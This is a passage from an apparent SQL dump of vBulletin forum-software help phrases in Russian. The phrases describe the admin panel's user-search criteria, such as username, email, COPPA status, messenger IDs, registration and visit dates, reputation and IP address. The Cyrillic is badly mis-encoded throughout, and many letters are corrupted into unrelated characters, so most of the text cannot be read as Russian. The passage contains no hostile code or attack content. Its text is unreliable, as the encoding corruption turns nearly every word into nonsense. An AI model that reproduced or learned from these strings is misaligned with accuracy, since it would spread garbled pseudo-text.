\r\nÒàáëèöà \"Ãûñòðûé ïîèñê\" èìååò íåñêîëüêî îïöèé. \"Ãîêàçàòü âñåõ ïîëüçîâàòåëåé\" ïîêàçûâàåò áóêâàëüíî âñåõ ïîëüçîâàòåëåé, íå îãðàíè÷èâàÿ ðåçóëüòàòû ïîèñêà. \"Ñïèñîê ëó÷øèõ àâòîðîâ\" îòîáðàæàåò âñåõ ïîëüçîâàòåëåé è ñîðòèðóåò èõ ïî êîëè÷åñòâó ðàçìåùåííûõ èìè ñîîáùåíèé, ïîêàçûâàÿ ïîëüçîâàòåëÿ ñ íàèáîëüøèì ÷èñëîì ñîîáùåíèé ïåðâûì. \"Ñïèñîê ïîñåòèòåëåé çà ïðîøëûå 24 ÷àñà\" îòîáðàæàåò âñåõ ïîëüçîâàòåëåé, ïîñåòèâøèõ âàø ôîðóì çà ïîñëåäíèå 24 ÷àñà. \"Ãîñëåäíèå ðåãèñòðàöèè\" îòîáðàæàåò âñåõ ïîëüçîâàòåëåé è ñîðòèðóåò èõ ïî äàòå ðåãèñòðàöèè, ïîêàçûâàÿ ïîñëåäíèõ çàðåãèñòðèðîâàâøèõñÿ ïåðâûìè. \"Ñïèñîê ïîëüçîâàòåëåé, îæèäàþùèõ ïðîâåðêè\" îòîáðàæàåò âñåõ ïîëüçîâàòåëåé, êòî îòíîñèòñÿ ê ãðóïïå ïîëüçîâàòåëåé \"(COPPA) Ãîëüçîâàòåëè, îæèäàþùèå ïðîâåðêè\". \"Ãîêàçàòü COPPA ïîëüçîâàòåëåé\" îòîáðàæàåò âñåõ ïîëüçîâàòåëåé, êòî îòìå÷åí êàê COPPA ïîëüçîâàòåëü. Äëÿ òîãî, ÷òîáû áîëüøå óçíàòü î COPPA, íàæìèòå çäåñü.

\r\nÒàáëèöà \"Ãàñøèðåííûé ïîèñê\" ñîäåðæèò ðàçíîîáðàçíûå îïöèè ïîèñêà. Ñìîòðèòå ïîäðîáíóþ èíôîðìàöèþ íèæå, åñëè ó âàñ âîçíèêëè êàêèå-ëèáî âîïðîñû.', 'vbulletin', 'zCarot', 1231760784, '3.8.1'), (24333, -1, 'user_modify_title', 'cphelptext', 'Ãîèñê ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24334, -1, 'user_modify_username_text', 'cphelptext', 'Ãóäóò íàéäåíû ïîëüçîâàòåëè, èìåíà êîòîðûõ ñîäåðæèò óêàçàííóþ çäåñü ñòðîêó. Îíè íå îáÿçàòåëüíî äîëæíû ñîñòàâëÿòü ñëîâî öåëèêîì, íî äîëæíû áûòü â òîì æå ïîðÿäêå, êàê è â èìåíè.

\r\nÃàïðèìåð, ñòðîêà ïðèì ñîîòâåòñòâóåò ñëîâàì ïðèìåð, íåïðèìåòíûé è ïðèìåðî÷íàÿ, íî íå ïðèåìëåìûé.', 'vbulletin', '', 0, ''), (24335, -1, 'user_modify_username_title', 'cphelptext', 'Ñîñòàâëÿþùèå èìåíè ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (24336, -1, 'user_modify_usergroupid_text', 'cphelptext', 'Ãîèñê ïîëüçîâàòåëåé, ïðèíàäëåæàùèõ óêàçàííîé îñíîâíîé ãðóïïå.', 'vbulletin', '', 0, ''), (24337, -1, 'user_modify_usergroupid_title', 'cphelptext', 'Îñíîâíàÿ ãðóïïà ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24338, -1, 'user_modify_membergroup_text', 'cphelptext', 'Óêàæèòå ãðóïïû ïîëüçîâàòåëåé, â êîòîðûå äîëæíû âõîäèòü èñêîìûå ïîëüçîâàòåëè.', 'vbulletin', '', 0, ''), (24339, -1, 'user_modify_membergroup_title', 'cphelptext', 'Òàêæå ïðèíàäëåæèò ãðóïïàì', 'vbulletin', '', 0, ''), (24340, -1, 'user_modify_adminemail_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëèò âàì âêëþ÷àòü èëè èñêëþ÷àòü èç ðåçóëüòàòîâ ïîèñêà ïîëüçîâàòåëåé ïî êðèòåðèþ âêëþ÷åííîñòè îïöèè \"Ãðèíèìàòü ýëåêòðîííûå ïèñüìà îò àäìèíèñòðàöèè\" â èõ íàñòðîéêàõ.', 'vbulletin', '', 0, ''), (24341, -1, 'user_modify_adminemail_title', 'cphelptext', 'Âêëþ÷àÿ ïîëüçîâàòåëåé, êîòîðûå îòêëþ÷èëè ïîëó÷åíèå ýëåêòðîííûõ ïèñåì îò àäìèíèñòðàöèè', 'vbulletin', '', 0, ''), (24342, -1, 'user_modify_email_text', 'cphelptext', 'Àäðåñà ýëåêòðîííîé ïî÷òû íàéäåííûõ ïîëüçîâàòåëåé áóäóò ñîäåðæàòü ñòðîêó, ââåä¸ííóþ çäåñü. Ñì. Èìÿ, ÷òîáû óçíàòü ïîäðîáíîñòè îòáîðà ïî ýòîìó è ïîäîáíûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24343, -1, 'user_modify_email_title', 'cphelptext', 'Ñîñòàâëÿþùèå àäðåñà ýëåêòðîííîé ïî÷òû', 'vbulletin', '', 0, ''), (24344, -1, 'user_modify_parentemail_text', 'cphelptext', 'Åñëè èñêîìûå ïîëüçîâàòåëè - COPPA, îíè äîëæíû ââîäèòü àäðåñ ýëåêòðîííîé ïî÷òû ñâîèõ ðîäèòåëåé äëÿ ïðîâåðêè. Åñëè ýòî òàê, òî ââåäåííàÿ ñþäà ñòðîêà äîëæíà ñîäåðæàòüñÿ â ýòîì àäðåñå, ÷òîáû ïîëüçîâàòåëü áûë íàéäåí. Ñì. Ñîñòàâëÿþùèå èìåíè ïîëüçîâàòåëÿ, ÷òîáû óçíàòü ïîäðîáíîñòè îòáîðà ïî ýòîìó è ïîäîáíûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24345, -1, 'user_modify_parentemail_title', 'cphelptext', 'Ñîñòàâëÿþùèå àäðåñà ýëåêòðîííîé ïî÷òû ðîäèòåëåé', 'vbulletin', '', 0, ''), (24346, -1, 'user_modify_coppauser_text', 'cphelptext', 'Åñëè óñòàíîâëåíî â \"Äà\", áóäóò íàéäåíû âñå ïîëüçîâàòåëè COPPA; ò.Ã¥. èì áóäåò äî 13 ëåò. Óñòàíîâèòå çäåñü \"Ãåò\", ÷òîáû íå èñêàòü ïîëüçîâàòåëåé COPPA, èëè âûáåðèòå \"Îáà òèïà\", ÷òîáû èñêàòü è òåõ è äðóãèõ.', 'vbulletin', '', 0, ''), (24347, -1, 'user_modify_coppauser_title', 'cphelptext', 'Ãîëüçîâàòåëü COPPA', 'vbulletin', '', 0, ''), (24348, -1, 'user_modify_homepage_text', 'cphelptext', 'Ââåäèòå ñòðîêó, êîòîðàÿ äîëæíà ñîäåðæàòüñÿ â àäðåñå äîìàøíåé ñòðàíèöû èñêîìûõ ïîëüçîâàòåëåé. Ãîëüçîâàòåëè, íå óêàçàâøèå URL äîìàøíåé ñòðàíè÷êè, áóäóò àâòîìàòè÷åñêè èñêëþ÷åíû èç ðåçóëüòàòîâ ïîèñêà. Ñì. Ñîñòàâëÿþùèå èìåíè ïîëüçîâàòåëÿ, ÷òîáû óçíàòü ïîäðîáíîñòè îòáîðà ïî ýòîìó è ïîäîáíûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24349, -1, 'user_modify_homepage_title', 'cphelptext', 'Ñîñòàâëÿþùèå äîìàøíåé ñòðàíèöû', 'vbulletin', '', 0, ''), (24350, -1, 'user_modify_icq_text', 'cphelptext', 'Ââåäèòå öèôðû, êîòîðûå äîëæíû ñîäåðæàòüñÿ â íîìåðå ICQ èñêîìûõ ïîëüçîâàòåëåé. Ã’.ê. íîìåðà ICQ ñîäåðæàò òîëüêî öèôðû, âû ìîæåòå ââîäèòü ñþäà òîëüêî öèôðû. Ãîëüçîâàòåëè, íå óêàçàâøèå íîìåð ICQ, áóäóò àâòîìàòè÷åñêè èñêëþ÷åíû èç ðåçóëüòàòîâ ïîèñêà. Ñì. Ñîñòàâëÿþùèå èìåíè ïîëüçîâàòåëÿ, ÷òîáû óçíàòü ïîäðîáíîñòè îòáîðà ïî ýòîìó è ïîäîáíûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24351, -1, 'user_modify_icq_title', 'cphelptext', 'Ñîñòàâëÿþùèå íîìåðà ICQ', 'vbulletin', '', 0, ''), (24352, -1, 'user_modify_aim_text', 'cphelptext', 'Ââåäèòå ñòðîêó ñèìâîëîâ, êîòîðàÿ äîëæíà ñîäåðæàòüñÿ â èìåíè AIM èñêîìûõ ïîëüçîâàòåëåé. Ãîëüçîâàòåëè áåç èìåíè AIM àâòîìàòè÷åñêè èñêëþ÷àþòñÿ èç ðåçóëüòàòîâ ïîèñêà. Ñì. Ñîñòàâëÿþùèå èìåíè ïîëüçîâàòåëÿ, ÷òîáû óçíàòü ïîäðîáíîñòè îòáîðà ïî ýòîìó è ïîäîáíûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24353, -1, 'user_modify_aim_title', 'cphelptext', 'Ñîñòàâëÿþùèå AIM-èäåíòèôèêàòîðà', 'vbulletin', '', 0, ''), (24354, -1, 'user_modify_yahoo_text', 'cphelptext', 'Ââåäèòå ñòðîêó, êîòîðàÿ äîëæíà ñîäåðæàòüñÿ â èìåíè Yahoo Messenger ïîëüçîâàòåëÿ. Ãîëüçîâàòåëè, íå óêàçàâøèå èìÿ Yahoo Messenger, áóäóò àâòîìàòè÷åñêè èñêëþ÷åíû èç ðåçóëüòàòîâ ïîèñêà. Ñì. Ñîñòàâëÿþùèå èìåíè ïîëüçîâàòåëÿ, ÷òîáû óçíàòü ïîäðîáíîñòè îòáîðà ïî ýòîìó è ïîäîáíûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24355, -1, 'user_modify_yahoo_title', 'cphelptext', 'Èäåíòèôèêàòîð Yahoo Messenger', 'vbulletin', '', 0, ''), (24356, -1, 'user_modify_msn_text', 'cphelptext', 'Ââåäèòå ñòðî÷êó, êîòîðóþ äîëæíî ñîäåðæàòü èìÿ MSN ïîëüçîâàòåëÿ. Ãîëüçîâàòåëè, íå óêàçàâøèå èìåíè MSN, áóäóò àâòîìàòè÷åñêè èñêëþ÷åíû èç ðåçóëüòàòîâ ïîèñêà. Ñì. Ñîñòàâëÿþùèå èìåíè ïîëüçîâàòåëÿ, ÷òîáû óçíàòü ïîäðîáíîñòè îòáîðà ïî ýòîìó è ïîäîáíûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24357, -1, 'user_modify_msn_title', 'cphelptext', 'Èìÿ MSN', 'vbulletin', '', 0, ''), (24358, -1, 'user_modify_skype_text', 'cphelptext', 'Ââåäèòå ñòðî÷êó, êîòîðàÿ äîëæíà ñîäåðæàòüñÿ â ïîëüçîâàòåëüñêîì èìåíè Skype.
\r\n
\r\nÃîëüçîâàòåëè, ó êîòîðûõ íå óêàçàíî èìÿ â Skype, áóäóò àâòîìàòè÷åñêè èñêëþ÷åíû èç ïîèñêà. Ñì. Ñîñòàâëÿþùèå èìåíè ïîëüçîâàòåëÿ äëÿ ïîëó÷åíèÿ áîëüøåé èíôîðìàöèè î ïîèñêå ÷àñòè ñëîâà, èñïîëüçóåìîé çäåñü.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24359, -1, 'user_modify_skype_title', 'cphelptext', 'Èìÿ â Skype', 'vbulletin', '', 0, ''), (24360, -1, 'user_modify_signature_text', 'cphelptext', 'Ââåäèòå ñòðîêó, êîòîðàÿ äîëæíà ñîäåðæàòüñÿ â ïîäïèñè èñêîìûõ ïîëüçîâàòåëåé. Ãîëüçîâàòåëè áåç ïîäïèñè áóäóò àâòîìàòè÷åñêè èñêëþ÷åíû èç ðåçóëüòàòîâ ïîèñêà. Ñì. Ñîñòàâëÿþùèå èìåíè ïîëüçîâàòåëÿ, ÷òîáû óçíàòü ïîäðîáíîñòè îòáîðà ïî ýòîìó è ïîäîáíûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24361, -1, 'user_modify_signature_title', 'cphelptext', 'Ñîñòàâëÿþùèå ïîäïèñè', 'vbulletin', '', 0, ''), (24362, -1, 'user_modify_usertitle_text', 'cphelptext', 'Ââåäèòå ñòðîêó, êîòîðàÿ äîëæíà ñîäåðæàòüñÿ â ñòàòóñå èñêîìûõ ïîëüçîâàòåëåé. Ãòîò ïîèñê áóäåò ðàáîòàòü, äàæå åñëè âû çàïðåòèëè îñîáûå ñòàòóñû, ò.ê. ñòàòóñ ïîëüçîâàòåëÿ õðàíèòñÿ âìåñòå ñ åãî èìåíåì ïîëüçîâàòåëÿ; òàêæå áóäåò îñóùåñòâëåí ïîèñê ïî ñòàòóñó, îïðåäåëåííîìó äëÿ ÷ëåíà ãðóïïû, â êîòîðóþ âõîäèò ïîëüçîâàòåëü. Ñì. Ñîñòàâëÿþùèå èìåíè ïîëüçîâàòåëÿ, ÷òîáû óçíàòü ïîäðîáíîñòè îòáîðà ïî ýòîìó è ïîäîáíûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24363, -1, 'user_modify_usertitle_title', 'cphelptext', 'Ñîñòàâëÿþùèå ñòàòóñà ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (24364, -1, 'user_modify_joindateafter_text', 'cphelptext', 'Ãóäóò íàéäåíû ïîëüçîâàòåëè, äàòà ðåãèñòðàöèè êîòîðûõ ÃÎÑËÅ óêàçàííîé äàòû. Ôîðìàò äàòû - ãããã-ìì-ää; íàïðèìåð, 2005-02-26. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâàí âìåñòå ñ êðèòåðèåì \"Ãåãèñòðàöèÿ äî\" äëÿ ïîèñêà îïðåäåë¸ííîãî ïðîìåæóòêà âðåìåíè. Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòà äàòà äîëæíà áûòü ÄÎ äàòû, óêàçàííîé â \"Ãåãèñòðàöèÿ äî\". (Ñì. Ãåãèñòðàöèÿ äî)', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24365, -1, 'user_modify_joindateafter_title', 'cphelptext', 'Ãåãèñòðàöèÿ ïîñëå', 'vbulletin', '', 0, ''), (24366, -1, 'user_modify_joindatebefore_text', 'cphelptext', 'Ãóäóò íàéäåíû ïîëüçîâàòåëè, äàòà ðåãèñòðàöèè êîòîðûõ ÄÎ óêàçàííîé äàòû. Ôîðìàò äàòû - ãããã-ìì-ää; íàïðèìåð, 2005-02-26. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâàí âìåñòå ñ êðèòåðèåì \"Ãåãèñòðàöèÿ ïîñëå\" äëÿ ïîèñêà îïðåäåë¸ííîãî ïðîìåæóòêà âðåìåíè. Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòà äàòà äîëæíà áûòü ÃÎÑËÅ äàòû, óêàçàííîé â \"Ãåãèñòðàöèÿ ïîñëå\". (Ñì. Ãåãèñòðàöèÿ ïîñëå)', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24367, -1, 'user_modify_joindatebefore_title', 'cphelptext', 'Ãåãèñòðàöèÿ äî', 'vbulletin', '', 0, ''), (24368, -1, 'user_modify_lastactivityafter_text', 'cphelptext', 'Ãóäóò íàéäåíû ïîëüçîâàòåëè, îòêðûâàâøèå ñòðàíèöû ôîðóìà ïîçæå ýòîé äàòû. Ôîðìàò: ãããã-ìì-ää; íàïðèìåð, 2005-07-21. Ãòîò êðèòåðèé ìîæåò èñïîëüçîâàòüñÿ ñîâìåñòíî ñ êðèòåðèåì ïîèñêà ïîëüçîâàòåëÿ \"Ãîñëåäíÿÿ àêòèâíîñòü äî\", òîãäà áóäåò çàäàí èíòåðâàë âðåìåíè ïîñëåäíåé àêòèâíîñòè ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24369, -1, 'user_modify_lastactivityafter_title', 'cphelptext', 'Ãîñëåäíÿÿ àêòèâíîñòü ïîñëå', 'vbulletin', '', 0, ''), (24370, -1, 'user_modify_lastactivitybefore_text', 'cphelptext', 'Ãóäóò íàéäåíû ïîëüçîâàòåëè, îòêðûâàâøèå ñòðàíèöû ôîðóìà äî ýòîé äàòû. Ôîðìàò: ãããã-ìì-ää; íàïðèìåð, 2005-07-21. Ãòîò êðèòåðèé ìîæåò èñïîëüçîâàòüñÿ ñîâìåñòíî ñ êðèòåðèåì ïîèñêà ïîëüçîâàòåëÿ \"Ãîñëåäíÿÿ àêòèâíîñòü ïîñëå\", òîãäà áóäåò çàäàí èíòåðâàë âðåìåíè ïîñëåäíåé àêòèâíîñòè ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24371, -1, 'user_modify_lastactivitybefore_title', 'cphelptext', 'Ãîñëåäíÿÿ àêòèâíîñòü äî', 'vbulletin', '', 0, ''), (24372, -1, 'user_modify_lastvisitafter_text', 'cphelptext', 'Ãóäóò íàéäåíû ïîëüçîâàòåëè, äàòà è âðåìÿ ïîñëåäíåãî âèçèòà êîòîðûõ ÃÎÑËÅ óêàçàííîé äàòû. Ôîðìàò äàòû è âðåìåíè - ãããã-ìì-ää ÷÷:ìì:ññ; íàïðèìåð, 2005-02-26 22:45:00 íàéäåò âñåõ ïîëüçîâàòåëåé, êòî ïîñëåäíèé ðàç ïîñåùàë ôîðóì ïîñëå 22:45 26 ôåâðàëÿ 2005 ã. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâàí âìåñòå ñ êðèòåðèåì \"Ãîñëåäíèé âèçèò äî\" äëÿ ïîèñêà îïðåäåë¸ííîãî ïðîìåæóòêà âðåìåíè. Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòà äàòà äîëæíà áûòü ÄÎ äàòû, óêàçàííîé â \"Ãîñëåäíèé âèçèò äî\". (Ñì. Ãîñëåäíèé âèçèò äî)', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24373, -1, 'user_modify_lastvisitafter_title', 'cphelptext', 'Ãîñëåäíåå ïîñåùåíèå ïîñëå', 'vbulletin', '', 0, ''), (24374, -1, 'user_modify_lastvisitbefore_text', 'cphelptext', 'Ãóäóò íàéäåíû ïîëüçîâàòåëè, äàòà è âðåìÿ ïîñëåäíåãî âèçèòà êîòîðûõ ÄÎ óêàçàííîé äàòû. Ôîðìàò äàòû è âðåìåíè - ãããã-ìì-ää ÷÷:ìì:ññ; íàïðèìåð, 2005-02-26 23:50:00 íàéäåò âñåõ ïîëüçîâàòåëåé, êòî ïîñëåäíèé ðàç ïîñåùàë ôîðóì äî 23:50 26 ôåâðàëÿ 2005 ã. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâàí âìåñòå ñ êðèòåðèåì \"Ãîñëåäíèé âèçèò ïîñëå\" äëÿ ïîèñêà îïðåäåë¸ííîãî ïðîìåæóòêà âðåìåíè. Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòà äàòà äîëæíà áûòü ÃÎÑËÅ äàòû, óêàçàííîé â \"Ãîñëåäíèé âèçèò ïîñëå\". (Ñì. Ãîñëåäíèé âèçèò ïîñëå)', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24375, -1, 'user_modify_lastvisitbefore_title', 'cphelptext', 'Ãîñëåäíåå ïîñåùåíèå äî', 'vbulletin', '', 0, ''), (24376, -1, 'user_modify_lastpostafter_text', 'cphelptext', 'Ãóäóò íàéäåíû ïîëüçîâàòåëè, äàòà è âðåìÿ ïîñëåäíåãî ñîîáùåíèÿ êîòîðûõ ÃÎÑËÅ óêàçàííîé äàòû. Ôîðìàò äàòû è âðåìåíè - ãããã-ìì-ää ÷÷:ìì:ññ; íàïðèìåð, 2005-02-26 22:24:00 íàéäåò âñåõ ïîëüçîâàòåëåé, êòî îñòàâëÿë ñâîè ñîîáùåíèÿ ïîñëå 22:24 26 ôåâðàëÿ 2005 ã. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâàí âìåñòå ñ êðèòåðèåì \"Ãîñëåäíåå ñîîáùåíèå äî\" äëÿ ïîèñêà îïðåäåë¸ííîãî ïðîìåæóòêà âðåìåíè. Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòà äàòà äîëæíà áûòü ÄÎ äàòû, óêàçàííîé â \"Ãîñëåäíåå ñîîáùåíèå äî\". (Ñì. Ãîñëåäíåå ñîîáùåíèå äî)', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24377, -1, 'user_modify_lastpostafter_title', 'cphelptext', 'Ãîñëåäíåå ñîîáùåíèå ïîñëå', 'vbulletin', '', 0, ''), (24378, -1, 'user_modify_lastpostbefore_text', 'cphelptext', 'Ãóäóò íàéäåíû ïîëüçîâàòåëè, äàòà è âðåìÿ ïîñëåäíåãî ñîîáùåíèÿ êîòîðûõ ÄÎ óêàçàííîé äàòû. Ôîðìàò äàòû è âðåìåíè - ãããã-ìì-ää ÷÷:ìì:ññ; íàïðèìåð, 2005-02-26 21:45:00 íàéäåò âñåõ ïîëüçîâàòåëåé, êòî îñòàâëÿë ñâîè ñîîáùåíèÿ äî 21:45 ìèíóò 26 ôåâðàëÿ 2005 ã. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâàí âìåñòå ñ êðèòåðèåì \"Ãîñëåäíåå ñîîáùåíèå ïîñëå\" äëÿ ïîèñêà îïðåäåë¸ííîãî ïðîìåæóòêà âðåìåíè. Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòà äàòà äîëæíà áûòü ÃÎÑËÅ äàòû, óêàçàííîé â \"Ãîñëåäíåå ñîîáùåíèå ïîñëå\" (Ñì. Ãîñëåäíåå ñîîáùåíèå ïîñëå)', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24379, -1, 'user_modify_lastpostbefore_title', 'cphelptext', 'Ãîñëåäíåå ñîîáùåíèå äî', 'vbulletin', '', 0, ''), (24380, -1, 'user_modify_birthdayafter_text', 'cphelptext', 'Îïöèÿ ïîèñêà ïîëüçîâàòåëåé ÑÒÀÃØÅ îïðåäåëåííîãî âîçðàñòà, äàòà ðîæäåíèÿ íàéäåííûõ ïîëüçîâàòåëåé áóäåò ïîçæå óêàçàííîé çäåñü äàòû. Ôîðìàò äàòû - ãããã-ìì-ää; íàïðèìåð, 2005-02-27. Ãîëüçîâàòåëè ñ íåóêàçàííûìè äíÿìè ðîæäåíèÿ áóäóò àâòîìàòè÷åñêè èñêëþ÷åíû èç ðåçóëüòàòîâ ïîèñêà. Ãòîò ïàðàìåòð ìîæåò áûòü èñïîëüçîâàí âìåñòå ñ ïàðàìåòðîì \"Äåíü ðîæäåíèÿ äî\" äëÿ ïîèñêà ïîëüçîâàòåëåé îïðåäåë¸ííîãî âîçðàñòà. Ãîìíèòå, ÷òî åñëè âû èñïîëüçóåòå îáà ïàðàìåòðà, òî ýòà äàòà äîëæíà áûòü ÄÎ äàòû, óêàçàííîé â \"Äåíü ðîæäåíèÿ äî\". (Ñì. Äåíü ðîæäåíèÿ äî)', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24381, -1, 'user_modify_birthdayafter_title', 'cphelptext', 'Äåíü ðîæäåíèÿ ïîñëå', 'vbulletin', '', 0, ''), (24382, -1, 'user_modify_birthdaybefore_text', 'cphelptext', 'Îïöèÿ ïîèñêà ïîëüçîâàòåëåé ÌÎËÎÆÅ îïðåäåëåííîãî âîçðàñòà, äàòà ðîæäåíèÿ íàéäåííûõ ïîëüçîâàòåëåé áóäåò ðàíüøå óêàçàííîé çäåñü äàòû. Ôîðìàò äàòû - ãããã-ìì-ää; íàïðèìåð, 2005-02-27. Ãòîò ïàðàìåòð ìîæåò áûòü èñïîëüçîâàí âìåñòå ñ ïàðàìåòðîì \"Äåíü ðîæäåíèÿ ïîñëå\" äëÿ ïîèñêà ïîëüçîâàòåëåé îïðåäåëåííîãî âîçðàñòà. Ãîìíèòå, ÷òî åñëè âû èñïîëüçóåòå îáà ýòè ïàðàìåòðà, ýòà äàòà äîëæíà áûòü ÃÎÇÆÅ äàòû, óêàçàííîé â \"Äåíü ðîæäåíèÿ ïîñëå\". (Ñì. Äåíü ðîæäåíèÿ ïîñëå)', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24383, -1, 'user_modify_birthdaybefore_title', 'cphelptext', 'Äåíü ðîæäåíèÿ äî', 'vbulletin', '', 0, ''), (24384, -1, 'user_modify_postslower_text', 'cphelptext', 'Ãîèñê ïîëüçîâàòåëåé, êîòîðûå ðàçìåñòèëè áîëåå èëè ðàâíîå óêàçàííîìó çäåñü ÷èñëó êîëè÷åñòâî ñîîáùåíèé. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâàí âìåñòå ñ êðèòåðèåì \"Ñîîáùåíèé ìåíüøå ÷åì\". Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòî ÷èñëî äîëæíà áûòü ÌÅÃÜØÅ èëè ÃÀÂÃÃŽ ÷èñëó, óêàçàííîãî â \"Ñîîáùåíèé ìåíüøå ÷åì\"', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24385, -1, 'user_modify_postslower_title', 'cphelptext', 'Ñîîáùåíèé áîëüøå èëè ðàâíî', 'vbulletin', '', 0, ''), (24386, -1, 'user_modify_postsupper_text', 'cphelptext', 'Ãîèñê ïîëüçîâàòåëåé, êîòîðûå ðàçìåñòèëè ìåíåå, ÷åì óêàçàííîå çäåñü ÷èñëî ñîîáùåíèé. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâàí âìåñòå ñ êðèòåðèåì \"Ñîîáùåíèé áîëüøå èëè ðàâíî ÷åì\". Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòî ÷èñëî äîëæíî áûòü ÃÎËÜØÅ ÷èñëà, óêàçàííîãî â \"Ñîîáùåíèé áîëüøå èëè ðàâíî ÷åì\".', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24387, -1, 'user_modify_postsupper_title', 'cphelptext', 'Ñîîáùåíèé ìåíüøå', 'vbulletin', '', 0, ''), (24388, -1, 'user_modify_reputationlower_text', 'cphelptext', 'Ãîèñê ïîëüçîâàòåëåé, êîòîðûå èìåþò ðåïóòàöèþ áîëüøóþ èëè ðàâíóþ óêàçàííîìó çäåñü ÷èñëó. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâàí âìåñòå ñ êðèòåðèåì \"Ãåïóòàöèÿ ìåíüøå ÷åì\", ÷òîáû çàäàòü ïðîìåæóòîê ðåïóòàöèè. Ãîìíèòå, ÷òî åñëè âû èñïîëüçóåòå îáà êðèòåðèÿ, òî ÷èñëî â äàííîì ïîëå äîëæíî áûòü ÌÅÃÜØÅ, ÷åì ÷èñëî â ïîëå \"Ãåïóòàöèÿ ìåíüøå ÷åì\", èíà÷å âû íå íàéä¸òå íè îäíîãî ïîëüçîâàòåëÿ! (Ñì. Ãåïóòàöèÿ ìåíüøå ÷åì)', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24389, -1, 'user_modify_reputationlower_title', 'cphelptext', 'Ãåïóòàöèÿ áîëüøå èëè ðàâíà ÷åì', 'vbulletin', '', 0, ''), (24390, -1, 'user_modify_reputationupper_text', 'cphelptext', 'Ãîèñê ïîëüçîâàòåëåé, êîòîðûå èìåþò ðåïóòàöèþ ìåíüøå, ÷åì óêàçàííîå ÷èñëî. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâàí âìåñòå ñ êðèòåðèåì \"Ãåïóòàöèÿ áîëüøå èëè ðàâíà ÷åì\". Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòî ÷èñëî äîëæíà áûòü ÃÎËÜØÅ ÷èñëà, óêàçàííîãî â \"Ãåïóòàöèÿ áîëüøå èëè ðàâíà ÷åì\".', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24391, -1, 'user_modify_reputationupper_title', 'cphelptext', 'Ãåïóòàöèÿ ìåíüøå ÷åì', 'vbulletin', '', 0, ''), (24392, -1, 'user_modify_ipaddress_text', 'cphelptext', 'Ââåäèòå â ýòîì ïîëå IP-àäðåñ. Ãòî ìîæåò áûòü ïîëíûé IP-àäðåñ (íàïðèìåð, 188.77.39.33) èëè ÷àñòè÷íûé (íàïðèìåð, 188.77.39).  ñëó÷àå ââîäà ÷àñòè÷íîãî àäðåñà, ðåçóëüòàòîì ïîèñêà áóäóò ïîëüçîâàòåëè ñ ëþáûìè ÷èñëàìè â ïîñëåäíåì îêòåòå (áëîêå) IP-àäðåñà.', 'vbulletin', '', 0, ''), (24393, -1, 'user_modify_ipaddress_title', 'cphelptext', 'Ñîñòàâëÿþùèå IP-àäðåñà', 'vbulletin', '', 0, ''), (24394, -1, 'user_modify_warningslower_text', 'cphelptext', 'Ãîèñê ïîëüçîâàòåëåé, êîòîðûå èìåþò ïðåäóïðåæäåíèé áîëüøå èëè ñòîëüêî æå, ñêîëüêî óêàçàíî çäåñü.', 'vbulletin', 'zCarot', 1207659868, '3.7.0 Release Candidate 3'), (24395, -1, 'user_modify_warningslower_title', 'cphelptext', 'Êîëè÷åñòâî 